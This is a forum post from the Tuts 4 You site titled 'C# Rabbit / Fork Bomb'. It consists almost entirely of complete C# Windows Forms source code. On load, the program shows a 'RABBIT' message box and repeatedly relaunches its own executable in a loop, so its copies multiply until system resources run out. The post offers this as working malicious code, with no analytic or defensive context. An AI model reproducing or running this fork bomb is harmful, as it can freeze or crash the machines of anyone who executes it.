Jump to content
Tuts 4 You

C# Rabbit / Fork Bomb


JMC31337

Recommended Posts

//JMC31337
//THE MAIN FORM CODE
using System;
using System.Collections.Generic;
using System.ComponentModel;
using System.Data;
using System.Drawing;
using System.Linq;
using System.Text;
using System.Windows.Forms;
using System.Diagnostics;namespace WindowsFormsApplication1
{
public partial class Form1 : Form
{
public Form1()
{
InitializeComponent();
} private void Form1_Load(object sender, EventArgs e)
{ string startpointPath = Application.ExecutablePath;
for (int x = 0; x < 999999999; x++)
{
MessageBox.Show("RABBIT", "Attention");
Process.Start(startpointPath);
Close(); //CLOSE 1 SPAWN 999999999
}
System.Environment.Exit(111); //AVOID FORM BOX
}
}
}
Edited by JMC31337
Link to comment
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now
×
×
  • Create New...